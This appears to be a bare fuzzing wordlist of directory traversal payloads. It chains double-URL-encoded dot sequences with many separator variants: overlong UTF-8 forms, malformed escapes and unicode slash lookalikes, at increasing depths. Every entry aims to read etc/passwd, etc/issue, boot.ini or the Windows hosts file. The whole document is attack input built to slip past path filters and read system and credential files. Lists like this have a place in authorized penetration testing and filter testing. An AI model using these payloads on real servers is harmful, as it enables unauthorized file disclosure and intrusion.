-%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8spasswd -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8sissue -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8sboot.ini -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8spasswd -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8sissue -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8sboot.ini -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8spasswd -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8sissue -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8sboot.ini -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8spasswd -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8sissue -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8sboot.ini -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8spasswd -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8setc%c1%8sissue -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8sboot.ini -%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8s%%32%%65%%32%%65%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%%32%%65%%32%%65%c1%1cetc%c1%1cpasswd -%%32%%65%%32%%65%c1%1cetc%c1%1cissue -%%32%%65%%32%%65%c1%1cboot.ini -%%32%%65%%32%%65%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cpasswd -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cissue -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cboot.ini -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cpasswd -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cissue -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cboot.ini -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cpasswd -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cissue -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cboot.ini -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cpasswd -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cissue -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cboot.ini -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cpasswd -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cetc%c1%1cissue -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cboot.ini -%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1c%%32%%65%%32%%65%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%32%%65%%32%%65%c1%afetc%c1%afpasswd -%%32%%65%%32%%65%c1%afetc%c1%afissue -%%32%%65%%32%%65%c1%afboot.ini -%%32%%65%%32%%65%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afpasswd -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afissue -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afboot.ini -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afpasswd -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afissue -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afboot.ini -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afpasswd -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afissue -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afboot.ini -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afpasswd -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afissue -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afboot.ini -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afpasswd -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afetc%c1%afissue -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afboot.ini -%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%af%%32%%65%%32%%65%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%32%%65%%32%%65%bg%qfetc%bg%qfpasswd -%%32%%65%%32%%65%bg%qfetc%bg%qfissue -%%32%%65%%32%%65%bg%qfboot.ini -%%32%%65%%32%%65%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfpasswd -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfissue -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfboot.ini -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfpasswd -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfissue -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfboot.ini -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfpasswd -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfissue -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfboot.ini -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfpasswd -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfissue -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfboot.ini -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfpasswd -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfetc%bg%qfissue -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfboot.ini -%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qf%%32%%65%%32%%65%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%32%%65%%32%%65%u2215etc%u2215passwd -%%32%%65%%32%%65%u2215etc%u2215issue -%%32%%65%%32%%65%u2215boot.ini -%%32%%65%%32%%65%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215passwd -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215issue -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215boot.ini -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215passwd -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215issue -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215boot.ini -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215passwd -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215issue -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215boot.ini -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215passwd -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215issue -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215boot.ini -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215passwd -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215etc%u2215issue -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215boot.ini -%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215%%32%%65%%32%%65%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%32%%65%%32%%65%u2216etc%u2216passwd -%%32%%65%%32%%65%u2216etc%u2216issue -%%32%%65%%32%%65%u2216boot.ini -%%32%%65%%32%%65%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216passwd -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216issue -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216boot.ini -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216passwd -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216issue -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216boot.ini -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216passwd -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216issue -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216boot.ini -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216passwd -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216issue -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216boot.ini -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216passwd -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216etc%u2216issue -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216boot.ini -%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216%%32%%65%%32%%65%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%32%%65%%32%%65%uEFC8etc%uEFC8passwd -%%32%%65%%32%%65%uEFC8etc%uEFC8issue -%%32%%65%%32%%65%uEFC8boot.ini -%%32%%65%%32%%65%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8passwd -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8issue -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8boot.ini -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8passwd -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8issue -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8boot.ini -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8passwd -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8issue -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8boot.ini -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8passwd -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8issue -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8boot.ini -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8passwd -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8etc%uEFC8issue -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8boot.ini -%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8%%32%%65%%32%%65%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%32%%65%%32%%65%uF025etc%uF025passwd -%%32%%65%%32%%65%uF025etc%uF025issue -%%32%%65%%32%%65%uF025boot.ini -%%32%%65%%32%%65%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025passwd -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025issue -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025boot.ini -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025passwd -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025issue -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025boot.ini -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025passwd -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025issue -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025boot.ini -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025passwd -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025issue -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025boot.ini -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025passwd -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025etc%uF025issue -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025boot.ini -%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025%%32%%65%%32%%65%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%32%%65%%32%%65%%32%%66etc%%32%%66passwd -%%32%%65%%32%%65%%32%%66etc%%32%%66issue -%%32%%65%%32%%65%%32%%66boot.ini -%%32%%65%%32%%65%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66passwd -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66issue -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66boot.ini -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66passwd -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66etc%%32%%66issue -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66boot.ini -%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66%%32%%65%%32%%65%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts 